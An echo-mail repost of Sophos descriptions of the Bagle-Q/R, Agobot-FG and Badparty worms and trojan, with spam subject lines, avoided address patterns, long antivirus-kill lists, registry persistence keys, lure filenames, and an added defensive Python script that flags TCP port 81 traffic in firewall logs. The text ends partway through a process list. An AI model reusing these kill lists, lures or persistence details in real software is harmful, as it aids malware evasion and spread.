| echo: | |
|---|---|
| to: | |
| from: | |
| date: | |
| subject: | News |
[cut-n-paste from sophos.com]
W32/Bagle-Q
Aliases
Win32/Bagle.Q
Type
Win32 executable file virus
Detection
Sophos has received several reports of this virus from the wild.
Description
W32/Bagle-Q is a mass-mailing virus that spreads in an unusual manner.
W32/Bagle-Q spreads via a "carrier" email which does not contain the worm
as an attachment.
The email has the following characteristics:
The Sender address is spoofed.
Subject line: randomly chosen from -
Re: Msg reply
Re: Hello
Re: Yahoo!
Re: Thank you!
Re: Thanks :)
RE: Text message
Re: Document
Incoming message
Re: Incoming Message
Re: Incoming Fax
Hidden message
Fax Message Received
Protected message
RE: Protected message
Forum notify
Request response
Site changes
Re: Hi
Encrypted document
There is no visible message text.
The email addresses are harvested from the hard drive of infected
machines by searching for files with the extensions WAB, TXT, MSG, HTM,
SHTM, STM, XML, DBX, MBX, MDX, EML, NCH, MMF, ODS, CFG, ASP, PHP, WSH,
ADB, TBB, SHT, XLS and OFT.
W32/Bagle-Q avoids email addresses containing the following:
{at}hotmail, {at}msn, {at}microsoft, rating{at}, f-secur, anyone{at}, bugs{at}, contract{at},
feste, gold-certs{at}, help{at}, info{at}, nobody{at}, noone{at}, kasp, admin, icrosoft,
support, ntivi, unix, linux, listserv, certific, sopho, {at}foo, {at}iana,
free-av, {at}messagelab, winzip, google, winrar, samples, abuse, panda,
cafee, spam, {at}avp., noreply, local, root{at}, postmaster{at}
When you open the "carrier" email, the email attempts to exploit a
vulnerability in Outlook. The exploit may cause the email client to
automatically download W32/Bagle-Q from the IP address of a computer
infected with a Bagle variant. The IP address of the computer "server"
serving the Bagle executable is randomly chosen from a list of 590
IP addresses held in the virus's data section.
The security vulnerability was reportedly patched by Microsoft in
Microsoft Security Bulletin MS03-040.
The "carrier" email connects to port 81 of the host and opens an HTML
file. The HTML file drops and launches a Visual Basic script q.vbs. This
script connects to the same server and downloads W32/Bagle-Q via an HTTP
(web) request to TCP port 81.
The downloaded copy of W32/Bagle-Q is placed into your system folder
with the name directs.exe or direct.exe (depending on the variant).
W32/Bagle-Q loads on your PC and terminates a wide range of security
applications. The list of applications is:
CLEANER3.EXE
au.exe
d3dupdate.exe
CLEANPC.EXE
AVprotect9x.exe
CMGRDIAN.EXE
CMON016.EXE
CPF9X206.EXE
CPFNT206.EXE
CV.EXE
CWNB181.EXE
CWNTDWMO.EXE
ICSSUPPNT.EXE
DEFWATCH.EXE
DEPUTY.EXE
DPF.EXE
DPFSETUP.EXE
DRWATSON.EXE
ENT.EXE
ESCANH95.EXE
AVXQUAR.EXE
ESCANHNT.EXE
ESCANV95.EXE
AVPUPD.EXE
EXANTIVIRUS-CNET.EXE
FAST.EXE
FIREWALL.EXE
FLOWPROTECTOR.EXE
FP-WIN_TRIAL.EXE
FRW.EXE
FSAV.EXE
AUTODOWN.EXE
FSAV530STBYB.EXE
FSAV530WTBYB.EXE
FSAV95.EXE
GBMENU.EXE
GBPOLL.EXE
GUARD.EXE
GUARDDOG.EXE
HACKTRACERSETUP.EXE
HTLOG.EXE
HWPE.EXE
IAMAPP.EXE
IAMAPP.EXE
IAMSERV.EXE
ICLOAD95.EXE
ICLOADNT.EXE
ICMON.EXE
ICSUPP95.EXE
ICSUPPNT.EXE
IFW2000.EXE
IPARMOR.EXE
IRIS.EXE
JAMMER.EXE
ATUPDATER.EXE
AUPDATE.EXE
KAVLITE40ENG.EXE
KAVPERS40ENG.EXE
KERIO-PF-213-EN-WIN.EXE
KERIO-WRL-421-EN-WIN.EXE
BORG2.EXE
BS120.EXE
CDP.EXE
CFGWIZ.EXE
CFIADMIN.EXE
CFIAUDIT.EXE
AUTOUPDATE.EXE
CFINET.EXE
NAVAPW32.EXE
NAVDX.EXE
NAVSTUB.EXE
NAVW32.EXE
NC2000.EXE
NCINST4.EXE
AUTOTRACE.EXE
NDD32.EXE
NEOMONITOR.EXE
NETARMOR.EXE
NETINFO.EXE
NETMON.EXE
NETSCANPRO.EXE
NETSPYHUNTER-1.2.EXE
NETSTAT.EXE
NISSERV.EXE
NISUM.EXE
NMAIN.EXE
NORTON_INTERNET_SECU_3.0_407.EXE
NPF40_TW_98_NT_ME_2K.EXE
NPFMESSENGER.EXE
NPROTECT.EXE
NSCHED32.EXE
NTVDM.EXE
NVARCH16.EXE
KERIO-WRP-421-EN-WIN.EXE
KILLPROCESSSETUP161.EXE
LDPRO.EXE
LOCALNET.EXE
LOCKDOWN.EXE
LOCKDOWN2000.EXE
LSETUP.EXE
OUTPOST.EXE
CFIAUDIT.EXE
LUCOMSERVER.EXE
AGENTSVR.EXE
ANTI-TROJAN.EXE
ANTI-TROJAN.EXE
ANTIVIRUS.EXE
ANTS.EXE
APIMONITOR.EXE
APLICA32.EXE
APVXDWIN.EXE
ATCON.EXE
ATGUARD.EXE
ATRO55EN.EXE
ATWATCH.EXE
AVCONSOL.EXE
AVGSERV9.EXE
AVSYNMGR.EXE
BD_PROFESSIONAL.EXE
BIDEF.EXE
BIDSERVER.EXE
BIPCP.EXE
BIPCPEVALSETUP.EXE
BISP.EXE
BLACKD.EXE
BLACKICE.EXE
BOOTWARN.EXE
NWINST4.EXE
NWTOOL16.EXE
OSTRONET.EXE
OUTPOSTINSTALL.EXE
OUTPOSTPROINSTALL.EXE
PADMIN.EXE
PANIXK.EXE
PAVPROXY.EXE
DRWEBUPW.EXE
PCC2002S902.EXE
PCC2K_76_1436.EXE
PCCIOMON.EXE
PCDSETUP.EXE
PCFWALLICON.EXE
PCFWALLICON.EXE
PCIP10117_0.EXE
PDSETUP.EXE
PERISCOPE.EXE
PERSFW.EXE
PF2.EXE
AVLTMAIN.EXE
PFWADMIN.EXE
PINGSCAN.EXE
PLATIN.EXE
POPROXY.EXE
POPSCAN.EXE
PORTDETECTIVE.EXE
PPINUPDT.EXE
PPTBC.EXE
PPVSTOP.EXE
PROCEXPLORERV1.0.EXE
PROPORT.EXE
PROTECTX.EXE
PSPF.EXE
WGFE95.EXE
WHOSWATCHINGME.EXE
AVWUPD32.EXE
NUPGRADE.EXE
WHOSWATCHINGME.EXE
WINRECON.EXE
WNT.EXE
WRADMIN.EXE
WRCTRL.EXE
WSBGATE.EXE
WYVERNWORKSFIREWALL.EXE
XPF202EN.EXE
ZAPRO.EXE
ZAPSETUP3001.EXE
ZATUTOR.EXE
CFINET32.EXE
CLEAN.EXE
CLEANER.EXE
CLEANER3.EXE
CLEANPC.EXE
CMGRDIAN.EXE
CMON016.EXE
CPD.EXE
CFGWIZ.EXE
CFIADMIN.EXE
PURGE.EXE
PVIEW95.EXE
QCONSOLE.EXE
QSERVER.EXE
RAV8WIN32ENG.EXE
REGEDT32.EXE
REGEDIT.EXE
UPDATE.EXE
RESCUE.EXE
RESCUE32.EXE
RRGUARD.EXE
RSHELL.EXE
RTVSCN95.EXE
RULAUNCH.EXE
SAFEWEB.EXE
SBSERV.EXE
SD.EXE
SETUP_FLOWPROTECTOR_US.EXE
SETUPVAMEEVAL.EXE
SFC.EXE
SGSSFW32.EXE
SH.EXE
SHELLSPYINSTALL.EXE
SHN.EXE
SMC.EXE
SOFI.EXE
SPF.EXE
SPHINX.EXE
SPYXX.EXE
SS3EDIT.EXE
ST2.EXE
SUPFTRL.EXE
LUALL.EXE
SUPPORTER5.EXE
SYMPROXYSVC.EXE
SYSEDIT.EXE
TASKMON.EXE
TAUMON.EXE
TAUSCAN.EXE
TC.EXE
TCA.EXE
TCM.EXE
TDS2-98.EXE
TDS2-NT.EXE
TDS-3.EXE
TFAK5.EXE
TGBOB.EXE
TITANIN.EXE
TITANINXP.EXE
TRACERT.EXE
TRJSCAN.EXE
TRJSETUP.EXE
TROJANTRAP3.EXE
UNDOBOOT.EXE
VBCMSERV.EXE
VBCONS.EXE
VBUST.EXE
VBWIN9X.EXE
VBWINNTW.EXE
VCSETUP.EXE
VFSETUP.EXE
VIRUSMDPERSONALFIREWALL.EXE
VNLAN300.EXE
VNPC3000.EXE
VPC42.EXE
VPFW30S.EXE
VPTRAY.EXE
VSCENU6.02D30.EXE
VSECOMR.EXE
VSHWIN32.EXE
VSISETUP.EXE
VSMAIN.EXE
VSMON.EXE
VSSTAT.EXE
VSWIN9XE.EXE
VSWINNTSE.EXE
VSWINPERSE.EXE
W32DSM89.EXE
W9X.EXE
WATCHDOG.EXE
WEBSCANX.EXE
CFIAUDIT.EXE
CFINET.EXE
ICSUPP95.EXE
MCUPDATE.EXE
CFINET32.EXE
CLEAN.EXE
CLEANER.EXE
LUINIT.EXE
MCAGENT.EXE
MCUPDATE.EXE
MFW2EN.EXE
MFWENG3.02D30.EXE
MGUI.EXE
MINILOG.EXE
MOOLIVE.EXE
MRFLUX.EXE
MSCONFIG.EXE
MSINFO32.EXE
MSSMMC32.EXE
MU0311AD.EXE
NAV80TRY.EXE
ZAUINST.EXE
ZONALM2601.EXE
ZONEALARM.EXE
A registry entry is added to the following key so that the program
directs.exe loads every time you logon to your computer:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
W32/Bagle-Q makes multiple copies of itself into folders which are
likely to be part of a file-sharing network. The filenames used are:
Microsoft Office 2003 Crack, Working!.exe
Microsoft Windows XP, WinXP Crack, working Keygen.exe
Microsoft Office XP working Crack, Keygen.exe
Porno, sex, oral, anal cool, awesome!!.exe
Porno Screensaver.scr
Serials.txt.exe
Porno pics arhive, xxx.exe
Windows Sourcecode update.doc.exe
Ahead Nero 7.exe
Windown Longhorn Beta Leak.exe
Opera 8 New!.exe
XXX hardcore images.exe
WinAmp 6 New!.exe
WinAmp 5 Pro Keygen Crack Update.exe
Adobe Photoshop 9 full.exe
Matrix 3 Revolution English Subtitles.exe
ACDSee 9.exe
W32/Bagle-Q infects programs on your PC by appending itself to existing
EXE files. The danger of W32/Bagle-Q can be mitigated not only by
updating Sophos Anti-Virus but also by blocking connections to TCP port
81 at your network firewall (this port is unlikely to be required for
any real services).
Blocking outbound port 81 connections stops computers on your network
from downloading the worm from outside. Blocking port 81 inbound means
that even if you do get infected you will not pass the virus on to
others.
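The two firewall rules above suggest the matching detection: in the firewall log, an internal host that opens connections to TCP port 81 has most likely rendered a carrier mail, and an internal host that accepts connections on port 81 is probably already infected and serving the worm. The following is an added example (not Sophos code) that triages a log for both cases; the log line format, the address ranges treated as internal, and the addresses themselves are all constructed for the example.

```python
"""Triage firewall logs for TCP/81 flows, the port the Bagle-Q/R carrier
uses to fetch the executable.  Added example (not from Sophos); the log
format and the addresses below are constructed."""
import ipaddress
from collections import defaultdict

# Address ranges that count as "our" network (assumption for the example).
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                 ipaddress.ip_network("192.168.0.0/16")]

def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)

def parse_line(line):
    """Constructed format: '<time> <proto> <src>:<port> -> <dst>:<port> <verdict>'."""
    ts, proto, src, _arrow, dst, verdict = line.split()
    sip, _sport = src.rsplit(":", 1)
    dip, dport = dst.rsplit(":", 1)
    return {"ts": ts, "proto": proto.upper(), "src": sip, "dst": dip,
            "dport": int(dport), "verdict": verdict.upper()}

def triage_port81(lines):
    """Return (clients, servers).

    clients: internal host -> set of TCP/81 targets it connected to; such a
             host has most likely opened a carrier mail (denied attempts
             count too, since the mail was already rendered).
    servers: internal host -> set of peers that connected to *its* port 81;
             such a host is probably infected and serving the worm.
    """
    clients, servers = defaultdict(set), defaultdict(set)
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        rec = parse_line(line)
        if rec["proto"] != "TCP" or rec["dport"] != 81:
            continue
        if is_internal(rec["src"]):
            clients[rec["src"]].add(rec["dst"])
        if is_internal(rec["dst"]):
            servers[rec["dst"]].add(rec["src"])
    return dict(clients), dict(servers)

# Constructed sample: one client downloading from an external Bagle host,
# one internal host being used as a download server, plus unrelated noise.
SAMPLE_LOG = """\
# time proto src -> dst verdict
2004-03-18T09:12:01 TCP 10.1.4.22:3345 -> 203.0.113.17:81 ALLOW
2004-03-18T09:12:03 TCP 10.1.4.22:3346 -> 203.0.113.17:81 ALLOW
2004-03-18T09:15:40 TCP 10.1.4.22:3350 -> 198.51.100.9:80 ALLOW
2004-03-18T09:20:11 TCP 198.51.100.77:1044 -> 10.1.9.5:81 ALLOW
2004-03-18T09:21:02 UDP 10.1.4.22:1025 -> 10.1.0.1:53 ALLOW
2004-03-18T09:30:00 TCP 10.1.7.8:2020 -> 10.1.9.5:81 ALLOW
2004-03-18T09:31:15 TCP 10.1.4.30:3400 -> 203.0.113.17:81 DENY
"""

if __name__ == "__main__":
    clients, servers = triage_port81(SAMPLE_LOG.splitlines())
    for host, peers in sorted(clients.items()):
        print(f"{host} fetched from port 81 on: {', '.join(sorted(peers))}")
    for host, peers in sorted(servers.items()):
        print(f"{host} served port 81 to: {', '.join(sorted(peers))}")
```

Hosts that appear in the `servers` result deserve priority: they are the ones that would keep spreading the worm even after the outbound block is in place, which is the page's reason for blocking the port in both directions.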
You should also apply the latest Internet Explorer/Outlook Express
patches from Microsoft. The vulnerability used by W32/Bagle-Q is
described in the Microsoft Security Bulletin MS03-040 and is referred
to as the "Object Tag vulnerability in Popup Window".
W32/Bagle-HTML
Aliases
HTML_BAGLE.Q1
Type
Win32 worm
Detection
Sophos has received several reports of this worm from the wild.
Description
Sophos Anti-Virus detects as W32/Bagle-HTML the email sent by
W32/Bagle-Q and W32/Bagle-R.
The email attempts to launch an exploit, described in Microsoft Security
Bulletin MS03-040, in order to automatically download and run the worm
from a number of compromised computers.
Troj/Badparty-A
Type
Trojan
Detection
At the time of writing, Sophos has received just one report of this
Trojan from the wild.
Description
Troj/Badparty-A displays a message box containing the text 'Press OK to
install the party invitation...'.
When the user clicks on OK the Trojan deletes the partition table in the
master boot sector and the contents of the FAT. The Trojan then attempts
to create a new partition table.
The Trojan creates the following files, which are all copies of
legitimate utilities:
ginst0.dll in the Windows temp folder
int86_16.dll, int86_32.dll, playme.exe and party.ini in the Windows
folder
W32/Agobot-FG
Aliases
Backdoor.Agobot.3.gen
Type
Win32 worm
Detection
At the time of writing, Sophos has received just one report of this worm
from the wild.
Description
W32/Agobot-FG is a network worm which also allows unauthorised remote
access to the computer via IRC channels.
W32/Agobot-FG tries to copy itself to network shares with weak passwords
and attempts to spread to computers using the DCOM RPC and the RPC
locator vulnerabilities.
These vulnerabilities allow the worm to execute its code on target
computers with System level privileges. For further information on
these vulnerabilities and for details on how to protect/patch the
computer against such attacks please see Microsoft security bulletins
MS03-001 and MS03-026. MS03-026 has been superseded by Microsoft
security bulletin MS03-039.
W32/Agobot-FG copies itself to the Windows system folder as EXPLORED.EXE
and creates entries in the registry at the following locations to run
itself on system restart:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
On NT-based versions of Windows W32/Agobot-FG tries to create a system
service called "mpr" which it sets to run on system startup, creating
registry entries in the following locations:
HKLM\System\CurrentControlSet\Services\MPR
HKLM\System\CurrentControlSet\Enum\Root\LEGACY_MPR
W32/Agobot-FG attempts to terminate the following virus, anti-virus and
security-related processes.
tftpd.exe
dllhost.exe
winppr32.exe
mspatch.exe
penis32.exe
msblast.exe
zonealarm.EXE
zapro.EXE
vsmon.EXE
vshwin32.EXE
vbcmserv.EXE
sbserv.EXE
rtvscan.EXE
rapapp.EXE
pcscan.EXE
pccwin97.EXE
pccntmon.EXE
pavproxy.EXE
nvsvc32.EXE
ntrtscan.EXE
npscheck.EXE
notstart.EXE
lockdown2000.EXE
iamserv.EXE
iamapp.EXE
gbpoll.EXE
gbmenu.EXE
fsmb32.EXE
fsma32.EXE
fsm32.EXE
fsgk32.EXE
fsav32.EXE
fsaa.EXE
fnrb32.EXE
fih32.EXE
fch32.EXE
fameh32.EXE
f-stopw.EXE
defscangui.EXE
defalert.EXE
cpd.EXE
cleaner3.EXE
cleaner.EXE
ccPxySvc.EXE
ccEvtMgr.EXE
ccApp.EXE
blackd.EXE
avpm.EXE
avkwctl9.EXE
avkservice.EXE
avkpop.EXE
apvxdwin.EXE
agentw.EXE
_AVPM.EXE
_AVPCC.EXE
_AVP32.EXE
ZONEALARM.EXE
ZONALM2601.EXE
ZAUINST.EXE
ZATUTOR.EXE
ZAPSETUP3001.EXE
ZAPRO.EXE
XPF202EN.EXE
WrCtrl.EXE
WrAdmin.EXE
WYVERNWORKSFIREWALL.EXE
WSBGATE.EXE
WRCTRL.EXE
WRADMIN.EXE
WNT.EXE
WINRECON.EXE
WIMMUN32.EXE
WHOSWATCHINGME.EXE
WGFE95.EXE
WFINDV32.EXE
WEBTRAP.EXE
WEBSCANX.EXE
WATCHDOG.EXE
W9X.EXE
W32DSM89.EXE
VetTray.EXE
Vet95.EXE
VbCons.EXE
VSWINPERSE.EXE
VSWINNTSE.EXE
VSWIN9XE.EXE
VSSTAT.EXE
VSMON.EXE
VSMAIN.EXE
VSISETUP.EXE
VSECOMR.EXE
VSCHED.EXE
VSCENU6.02D30.EXE
VSCAN40.EXE
VPTRAY.EXE
VPFW30S.EXE
VPC42.EXE
VPC32.EXE
VNPC3000.EXE
VNLAN300.EXE
VIRUSMDPERSONALFIREWALL.EXE
VIR-HELP.EXE
VFSETUP.EXE
VETTRAY.EXE
VET95.EXE
VET32.EXE
VCSETUP.EXE
VBWINNTW.EXE
VBWIN9X.EXE
VBUST.EXE
VBCONS.EXE
VBCMSERV.EXE
UPDATE.EXE
UNDOBOOT.EXE
TROJANTRAP3.EXE
TRJSETUP.EXE
TRJSCAN.EXE
TRACERT.EXE
TITANINXP.EXE
TITANIN.EXE
TGBOB.EXE
TFAK5.EXE
TFAK.EXE
TDS2-NT.EXE
TDS2-98.EXE
TDS-3.EXE
TCM.EXE
TCA.EXE
TC.EXE
TBSCAN.EXE
TAUMON.EXE
TASKMON.EXE
SymProxySvc.EXE
SweepNet.SWEEPSRV.SYS.SWNETSUP.EXE
Sphinx.EXE
SYSEDIT.EXE
SYMTRAY.EXE
SYMPROXYSVC.EXE
SWEEP95.EXE
SUPPORTER5.EXE
SUPFTRL.EXE
ST2.EXE
SS3EDIT.EXE
SPYXX.EXE
SPHINX.EXE
SPF.EXE
SOFI.EXE
SMC.EXE
SHN.EXE
SHELLSPYINSTALL.EXE
SH.EXE
SGSSFW32.EXE
SFC.EXE
SETUP_FLOWPROTECTOR_US.EXE
SETUPVAMEEVAL.EXE
SERV95.EXE
SD.EXE
SCRSCAN.EXE
SCANPM.EXE
SCAN95.EXE
SCAN32.EXE
SBSERV.EXE
SAFEWEB.EXE
RULAUNCH.EXE
RTVSCN95.EXE
RSHELL.EXE
RRGUARD.EXE
RESCUE32.EXE
RESCUE.EXE
REGEDT32.EXE
REGEDIT.EXE
REALMON.EXE
RAV8WIN32ENG.EXE
RAV7WIN.EXE
RAV7.EXE
QSERVER.EXE
QCONSOLE.EXE
PVIEW95.EXE
PURGE.EXE
PSPF.EXE
PROTECTX.EXE
PROPORT.EXE
PROGRAMAUDITOR.EXE
PROCEXPLORERV1.0.EXE
PROCESSMONITOR.EXE
PPVSTOP.EXE
PPTBC.EXE
PPINUPDT.EXE
PORTMONITOR.EXE
PORTDETECTIVE.EXE
POPSCAN.EXE
POPROXY.EXE
POP3TRAP.EXE
PLATIN.EXE
PINGSCAN.EXE
PFWADMIN.EXE
PF2.EXE
PERSWF.EXE
PERSFW.EXE
PERISCOPE.EXE
PDSETUP.EXE
PCIP10117_0.EXE
PCFWALLICON.EXE
PCDSETUP.EXE
PCCWIN98.EXE
PCCIOMON.EXE
PCC2K_76_1436.EXE
PCC2002S902.EXE
PAVW.EXE
PAVSCHED.EXE
PAVPROXY.EXE
PAVCL.EXE
PANIXK.EXE
PADMIN.EXE
OUTPOSTPROINSTALL.EXE
OUTPOSTINSTALL.EXE
OUTPOST.EXE
OSTRONET.EXE
Nupgrade.EXE
Nui.EXE
NeoWatchLog.EXE
Navw32.EXE
NWTOOL16.EXE
NWService.EXE
NWINST4.EXE
NVC95.EXE
NVARCH16.EXE
NTXconfig.EXE
NTVDM.EXE
NSCHED32.EXE
NPSSVC.EXE
NPROTECT.EXE
NPFMESSENGER.EXE
NPF40_TW_98_NT_ME_2K.EXE
NORTON_INTERNET_SECU_3.0_407.EXE
NORMIST.EXE
NOD32.EXE
NMAIN.EXE
NISUM.EXE
NISSERV.EXE
NETUTILS.EXE
NETSTAT.EXE
NETSPYHUNTER-1.2.EXE
NETSCANPRO.EXE
NETMON.EXE
NETINFO.EXE
NETARMOR.EXE
NEOMONITOR.EXE
NDD32.EXE
NCINST4.EXE
NC2000.EXE
NAVWNT.EXE
NAVW32.EXE
NAVSTUB.EXE
NAVNT.EXE
NAVLU32.EXE
NAVENGNAVEX15.NAVLU32.EXE
NAVDX.EXE
NAVAPW32.EXE
NAVAPSVC.EXE
NAVAP.navapsvc.EXE
NAV Auto-Protect.NAV80TRY.EXE
N32SCANW.EXE
Monitor.EXE
Mcshield.EXE
MWATCH.EXE
MU0311AD.EXE
MSSMMC32.EXE
MSINFO32.EXE
MSCONFIG.EXE
MRFLUX.EXE
MPFTRAY.EXE
MPFSERVICE.EXE
MPFAGENT.EXE
MOOLIVE.EXE
MONITOR.EXE
MINILOG.EXE
MGUI.EXE
MGHTML.EXE
MGAVRTE.EXE
MGAVRTCL.EXE
MFWENG3.02D30.EXE
MFW2EN.EXE
MCVSSHLD.EXE
MCVSRTE.EXE
MCUPDATE.EXE
MCTOOL.EXE
MCMNHDLR.EXE
MCAGENT.EXE
LUSPT.EXE
LUINIT.EXE
LUCOMSERVER.EXE
LUAU.EXE
LUALL.EXE
LSETUP.EXE
LOOKOUT.EXE
LOCKDOWN2000.EXE
LOCKDOWN.EXE
LOCALNET.EXE
LDSCAN.EXE
LDPROMENU.EXE
LDPRO.EXE
LDNETMON.EXE
KILLPROCESSSETUP161.EXE
KERIO-WRP-421-EN-WIN.EXE
KERIO-WRL-421-EN-WIN.EXE
KERIO-PF-213-EN-WIN.EXE
KAVPF.EXE
KAVPERS40ENG.EXE
KAVLITE40ENG.EXE
JEDI.EXE
JAMMER.EXE
ISRV95.EXE
IRIS.EXE
IPARMOR.EXE
IOMON98.EXE
IFW2000.EXE
IFACE.EXE
ICSUPPNT.EXE
ICSUPP95.EXE
ICMON.EXE
ICLOADNT.EXE
ICLOAD95.EXE
IBMAVSP.EXE
IBMASN.EXE
IAMSTATS.EXE
IAMSERV.EXE
IAMAPP.EXE
HWPE.EXE
HTLOG.EXE
HACKTRACERSETUP.EXE
GUARDDOG.EXE
GUARD.EXE
GENERICS.EXE
GBPOLL.EXE
GBMENU.EXE
FSAV95.EXE
FSAV530WTBYB.EXE
FSAV530STBYB.EXE
FSAV.EXE
FRW.EXE
FPROT.EXE
FP-WIN_TRIAL.EXE
FP-WIN.EXE
FLOWPROTECTOR.EXE
FIREWALL.EXE
FINDVIRU.EXE
FAST.EXE
F-STOPW.EXE
F-PROT95.EXE
F-PROT.EXE
F-AGNT95.EXE
EXPERT.EXE
EXE.AVXW.EXE
EXANTIVIRUS-CNET.EXE
EVPN.EXE
ETRUSTCIPE.EXE
ESPWATCH.EXE
ESCANV95.EXE
ESCANHNT.EXE
ESCANH95.EXE
ESAFE.EXE
ENT.EXE
EFPEADM.EXE
ECENGINE.EXE
DVP95_0.EXE
DVP95.EXE
DRWEB32.EXE
DRWATSON.EXE
DPFSETUP.EXE
DPF.EXE
DOORS.EXE
DEPUTY.EXE
DEFWATCH.EXE
Claw95cf.EXE
Claw95.EXE
CWNTDWMO.EXE
CWNB181.EXE
CV.EXE
CTRL.EXE
CPFNT206.EXE
CPF9X206.EXE
CPD.EXE
CONNECTIONMONITOR.EXE
CMON016.EXE
CMGRDIAN.EXE
CLEANPC.EXE
CLEANER3.EXE
CLEANER.EXE
CLEAN.EXE
CLAW95CF.EXE
CFINET32.EXE
CFINET.EXE
CFIAUDIT.EXE
CFIADMIN.EXE
CFGWIZ.EXE
CDP.EXE
BlackICE.EXE
BS120.EXE
BORG2.EXE
BOOTWARN.EXE
BLACKICE.EXE
BLACKD.EXE
BISP.EXE
BIPCPEVALSETUP.EXE
BIPCP.EXE
BIDSERVER.EXE
BIDEF.EXE
BD_PROFESSIONAL.EXE
Avsched32.EXE
AvkServ.EXE
Avgctrl.EXE
AvgServ.EXE
AvSynMgr.AVSYNMGR.EXE
AutoTrace.EXE
AckWin32.EXE
AVXQUAR.EXE
AVXMONITORNT.EXE
AVXMONITOR9X.EXE
AVWUPSRV.EXE
AVWUPD32.EXE
AVWINNT.EXE
AVWIN95.EXE
AVPUPD.EXE
AVPTC32.EXE
AVPM.EXE
AVPDOS32.EXE
AVPCC.EXE
AVP32.EXE
AVP.EXE
AVNT.EXE
AVGW.EXE
AVGUARD.EXE
AVGSERV9.EXE
AVGSERV.EXE
AVGNT.EXE
AVGCTRL.EXE
AVGCC32.EXE
AVE32.EXE
AVCONSOL.EXE
AUTOUPDATE.EXE
AUTODOWN.EXE
AUPDATE.EXE
ATWATCH.EXE
ATUPDATER.EXE
ATRO55EN.EXE
ATGUARD.EXE
ATCON.EXE
APVXDWIN.EXE
APLICA32.EXE
APIMONITOR.EXE
ANTS.EXE
ANTIVIRUS.EXE
ANTI-TROJAN.EXE
AMON9X.EXE
ALOGSERV.EXE
ALERTSVC.EXE
AGENTSVR.EXE
ADVXDWIN.EXE
ACKWIN32.EXE
W32/Bagle-R
Aliases
Win32/Bagle.R, W32/Bagle.R.worm, W32/Bagle.S, I-Worm.Bagle.p,
W32/Bagle.T, W32.Beagle.R{at}mm, W32.Beagle.S{at}mm, W32.Beagle.T{at}mm
Type
Win32 executable file virus
Detection
Sophos has received several reports of this virus from the wild.
Description
Please note: Sophos Anti-Virus also detects the W32/Bagle-S and
W32/Bagle-T worms as W32/Bagle-R.
W32/Bagle-R is a mass-mailing virus that spreads in an unusual manner.
W32/Bagle-R spreads via a "carrier" email which does not contain the
worm as an attachment.
The email has the following characteristics:
The Sender address is spoofed.
Subject line: randomly chosen from -
Re: Msg reply
Re: Hello
Re: Yahoo!
Re: Thank you!
Re: Thanks :)
RE: Text message
Re: Document
Incoming message
Re: Incoming Message
Re: Incoming Fax
Hidden message
Fax Message Received
Protected message
RE: Protected message
Forum notify
Request response
Site changes
Re: Hi
Encrypted document
There is no visible message text.
The email addresses are harvested from the hard drive of infected
machines by searching for files with the extensions WAB, TXT, MSG, HTM,
SHTM, STM, XML, DBX, MBX, MDX, EML, NCH, MMF, ODS, CFG, ASP, PHP, WSH,
ADB, TBB, SHT, XLS and OFT.
W32/Bagle-R avoids email addresses containing the following:
{at}hotmail, {at}msn, {at}microsoft, rating{at}, f-secur, anyone{at}, bugs{at}, contract{at},
feste, gold-certs{at}, help{at}, info{at}, nobody{at}, noone{at}, kasp, admin, icrosoft,
support, ntivi, unix, linux, listserv, certific, sopho, {at}foo, {at}iana,
free-av, {at}messagelab, winzip, google, winrar, samples, abuse, panda,
cafee, spam, {at}avp., noreply, local, root{at}, postmaster{at}
When you open the "carrier" email, the email attempts to exploit a
vulnerability in Outlook. The exploit may cause the email client to
automatically download W32/Bagle-R from the IP address of a computer
infected with a Bagle variant. The IP address of the computer "server"
serving the Bagle executable is randomly chosen from a list of 590
IP addresses held in the virus's data section.
The security vulnerability was reportedly patched by Microsoft in
Microsoft Security Bulletin MS03-040.
The "carrier" email connects to port 81 of the host and opens an HTML
file. The HTML file drops and launches a Visual Basic script q.vbs. This
script connects to the same server and downloads W32/Bagle-R via an HTTP
(web) request to TCP port 81.
The downloaded copy of W32/Bagle-R is placed into your system folder
with the name directs.exe or direct.exe (depending on the variant).
W32/Bagle-R loads on your PC and terminates a wide range of security
applications. The list of applications is:
CLEANER3.EXE
au.exe
d3dupdate.exe
CLEANPC.EXE
AVprotect9x.exe
CMGRDIAN.EXE
CMON016.EXE
CPF9X206.EXE
CPFNT206.EXE
CV.EXE
CWNB181.EXE
CWNTDWMO.EXE
ICSSUPPNT.EXE
DEFWATCH.EXE
DEPUTY.EXE
DPF.EXE
DPFSETUP.EXE
DRWATSON.EXE
ENT.EXE
ESCANH95.EXE
AVXQUAR.EXE
ESCANHNT.EXE
ESCANV95.EXE
AVPUPD.EXE
EXANTIVIRUS-CNET.EXE
FAST.EXE
FIREWALL.EXE
FLOWPROTECTOR.EXE
FP-WIN_TRIAL.EXE
FRW.EXE
FSAV.EXE
AUTODOWN.EXE
FSAV530STBYB.EXE
FSAV530WTBYB.EXE
FSAV95.EXE
GBMENU.EXE
GBPOLL.EXE
GUARD.EXE
GUARDDOG.EXE
HACKTRACERSETUP.EXE
HTLOG.EXE
HWPE.EXE
IAMAPP.EXE
IAMAPP.EXE
IAMSERV.EXE
ICLOAD95.EXE
ICLOADNT.EXE
ICMON.EXE
ICSUPP95.EXE
ICSUPPNT.EXE
IFW2000.EXE
IPARMOR.EXE
IRIS.EXE
JAMMER.EXE
ATUPDATER.EXE
AUPDATE.EXE
KAVLITE40ENG.EXE
KAVPERS40ENG.EXE
KERIO-PF-213-EN-WIN.EXE
KERIO-WRL-421-EN-WIN.EXE
BORG2.EXE
BS120.EXE
CDP.EXE
CFGWIZ.EXE
CFIADMIN.EXE
CFIAUDIT.EXE
AUTOUPDATE.EXE
CFINET.EXE
NAVAPW32.EXE
NAVDX.EXE
NAVSTUB.EXE
NAVW32.EXE
NC2000.EXE
NCINST4.EXE
AUTOTRACE.EXE
NDD32.EXE
NEOMONITOR.EXE
NETARMOR.EXE
NETINFO.EXE
NETMON.EXE
NETSCANPRO.EXE
NETSPYHUNTER-1.2.EXE
NETSTAT.EXE
NISSERV.EXE
NISUM.EXE
NMAIN.EXE
NORTON_INTERNET_SECU_3.0_407.EXE
NPF40_TW_98_NT_ME_2K.EXE
NPFMESSENGER.EXE
